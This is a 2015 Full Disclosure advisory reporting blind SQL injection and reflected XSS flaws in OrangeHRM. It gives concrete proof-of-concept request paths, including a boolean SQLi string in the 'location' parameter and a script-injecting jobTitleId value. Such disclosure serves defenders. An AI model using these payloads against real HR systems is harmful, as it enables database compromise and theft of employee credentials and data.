I. Overview ======================================================== OrangeHRM (Opensource 3.2.1, Professional & Enterprise 4.11) are prone to a multiple Blind SQL injection & XSS vulnerabilities. These vulnerabilities allows an attacker to inject SQL commands to compromise the affected database management system in HRM, perform operations on behalf of affected victim, redirect them to malicious sites, steal their credentials, and more.
II. Severity ======================================================== Rating: High Remote: Yes Authentication Require: Yes CVE-ID: III. Vendor's Description of Application ======================================================== OrangeHRM Solutions Effective HR tools and options to suit your needs Start-up, SME, global enterprises, whichever one you may be, OrangeHRM offers you flexibility and freedom to select from free and paid versions of OrangeHRM backed with specialized expertise. Our HR modules cover many major human capital management extents. OrangeHRM is used by millions of users around the world in all industries. Explore our solutions and contact our consultants to assist you with your selection process. http://www.orangehrm.com/ IV. Vulnerability Details & Exploit ======================================================== 1) Blind SQL Injection Request Method = GET a) /symfony/web/index.php/leave/getFilteredEmployeeCountAjax?location=-1)+or+(31337=31337)+and+(20=20&subunit=0 Request Method = POST b) /symfony/web/index.php/recruitment/viewCandidates sortField=[BSQLi] __________________________________________________________ 2) Multiple Reflected XSS Request Method = GET a) /symfony/web/index.php/admin/saveJobTitle?jobTitleId=1';+confirm(0);+// Request Method = POST b) /symfony/web/index.php/performance/saveReview saveReview360Form[reviewId] = [XSS Payload] saveReview = [XSS Payload] VI. Affected Systems ======================================================== Software: OrangeHRM Version: OrangeHRM Opensource 3.2.1 or prior OrangeHRM Professional & Enterprise 4.11 or prior Solution (Fix): No VII. Vendor Response/Solution ======================================================== Vendor Contacted : 02/12/2015 Vendor Response : 02/12/2015 Shared Technical Details/Poc : 02/13/2015 Again Vendor Contacted : 03/04/2015 Vendor Response: No Response Advisory Release : 04/10/2015 VIII.Credits ======================================================== Discovered by Rehan Ahmed knight_re...@hotmail.com _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/